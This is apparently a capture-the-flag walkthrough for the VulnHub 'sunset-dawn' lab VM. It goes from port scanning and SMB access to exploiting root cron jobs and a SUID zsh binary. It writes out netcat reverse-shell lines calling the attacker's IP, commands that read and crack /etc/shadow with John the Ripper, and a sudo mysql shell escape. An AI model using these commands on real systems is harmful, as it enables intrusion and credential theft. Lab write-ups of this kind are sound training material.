https://www.vulnhub.com/entry/sunset-dawn,341/
System Info
- Debian 10
Discover Target IP
sudo nmap -sn 192.168.122.1-255
Scan Ports
- `nmap -p- 192.168.122.11
nmap -p 80,139,445,3306 -sC -sV 192.168.122.11
enum4linux -a 192.168.122.11
Port 80
robots.txt
does not exist- using
dirb http://192.168.122.11
we can findhttp://192.168.122.11/logs/
- we can download
management.log
from it and take a look
SMB server
- Port 139 and port 445 indicate that there is a smb server on the target machine
- use
smbclient -L //dawn
to list all the service of it, and we can find shared diskITDEPT
- we can log into it by
smbclient //dawn/ITDEPT
- now we are in the smb share, but it is empty
- if we go back to reading that
management.log
, we can find lines like
...
2022/11/08 13:29:02 [31;1mCMD: UID=0 PID=666 | /usr/sbin/CRON -f [0m
2022/11/08 13:29:02 [31;1mCMD: UID=0 PID=669 | chmod 777 /home/dawn/ITDEPT/web-control [0m
2022/11/08 13:30:01 [31;1mCMD: UID=0 PID=671 | /usr/sbin/cron -f [0m
2022/11/08 13:30:01 [31;1mCMD: UID=0 PID=670 | /usr/sbin/CRON -f [0m
2022/11/08 13:30:01 [31;1mCMD: UID=0 PID=675 | /usr/sbin/CRON -f [0m
2022/11/08 13:30:01 [31;1mCMD: UID=0 PID=674 | /usr/sbin/cron -f [0m
2022/11/08 13:30:01 [31;1mCMD: UID=0 PID=673 | /usr/sbin/cron -f [0m
2022/11/08 13:30:01 [31;1mCMD: UID=0 PID=672 | /usr/sbin/CRON -f [0m
2022/11/08 13:30:01 [31;1mCMD: UID=0 PID=676 | /usr/sbin/CRON -f [0m
2022/11/08 13:30:01 [31;1mCMD: UID=0 PID=677 | /usr/sbin/CRON -f [0m
2022/11/08 13:30:01 [31;1mCMD: UID=0 PID=678 | /usr/sbin/CRON -f [0m
2022/11/08 13:30:01 [31;1mCMD: UID=0 PID=682 | /usr/sbin/CRON -f [0m
2022/11/08 13:30:01 [31;1mCMD: UID=0 PID=681 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control [0m
2022/11/08 13:30:01 [31;1mCMD: UID=1000 PID=680 | /bin/sh -c /home/dawn/ITDEPT/product-control [0m
2022/11/08 13:30:01 [31;1mCMD: UID=0 PID=679 | /usr/sbin/CRON -f [0m
2022/11/08 13:30:01 [31;1mCMD: UID=33 PID=685 | /bin/sh -c /home/dawn/ITDEPT/web-control [0m
2022/11/08 13:30:01 [31;1mCMD: UID=??? PID=684 | ???[0m
...
which indicated that there are cron jobs running every few minutes, that change the permission of ~/ITDEPT/web-control
and ~/ITDEPT/product-control
to 777
, and it will be run with bash as UID=33
and UID=1000
respectively, former is probably a daemon user like www-data
and latter is a user on the target system.
Reverse shell
- we can try to create our own
web-control
andproduct-control
bash script, we can addnc -nv 192.168.122.101 9393 -e /bin/bash
into them and for opening a reverse shell, - connect to the smb share and upload the file with
put product-control
- exit the share, opening a listening port on attacker’s machine
ncat -nvlp 9393
and just wait
Exploring the system
- now we have a reverse shell as user
dawn
, spawn a better shell withpython3 -c 'import pty;pty.spawn("/bin/bash")'
- If we search for all the files that belongs to
root
and have SUID bit setfind / -user root -perm -4000 -type f 2>/dev/null
we will find some binary files that we can run as normal users with root permission.
Privilege Esculation
- just running
zsh
will give us root
/usr/bin/zsh
- If we check out https://gtfobins.github.io/gtfobins/zsh/#file-read, there is a way for us to read restricted files using Zsh
export LFILE=/etc/shadow
to set/etc/shadow
file as environment variableLFILE
- now we can read it using
zsh -c 'echo "$(<$LFILE)"'
- we can Standard Out it into a another file
zsh -c 'echo "$(<$LFILE)"' > shadowfile
- get it back to attacker’s machine by starting a http server or move it into the
~/ITDEPT/
SMB shared directory - we will also need to copy the
/etc/passwd
too
Cracking passwords
- now we have both
/etc/passwd
and/etc/shadow
files of the target system, we can try to crack it - but first we need to combine both files using
unshadow passwd shadowfile > unshadowed
- then we can crack it using John the Ripper
john unshadowed --show
Rooting the system
- now we can log in as
ganimedes
with passwordsunshine
- check out their home directory, if we take a look at their
.bash_history
file, we can find a passphrase likethisisareallysecurepasswordnooneisgoingtoeverfind
- if we try to use it on different users, we can login as
root
!
MySQL
- run
sudo -l
we can see
...
User dawn may run the following commands on dawn:
(root) NOPASSWD: /usr/bin/mysql
- if we take a look at user
dawn
’s bash history file, we can find a line like this
...
echo "$1$$bOKpT2ijO.XcGlpjgAup9/"
...
- it seem a hashed password, if we use
hashid
orhash-identifier
, we know that it is MD5 Crypt - we can try to crack it using John the Ripper with a bigger wordlist
rockyou
john dawn.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt
and we can get dawn
’s passwd onii-chan29
.
- now we can use MySQL to execute bash as root with
dawn
’s password
sudo mysql -u root -p -e '\! /bin/bash'
- now we are
root
Phobos
- If we take a look at
management.log
again, we can find another cron job in there, which is under userganimedes
home directory, and it is executed byroot
(UID = 0)
...
2022/11/11 15:02:01 [31;1mCMD: UID=0 PID=1501 | /bin/sh -c /home/ganimedes/phobos [0m
...
and file phobos
doesn’t exist right now, so we can create our own reverse shell script and it will connect us as root
echo "nc -nv 192.168.122.101 9123 -e /bin/bash" > phobos && chmod +x phobos
- opening a listening port on attacker’s machine
ncat -nvlp 9123
- now we have a root shell
Capture The Flag
cat /root/flag.txt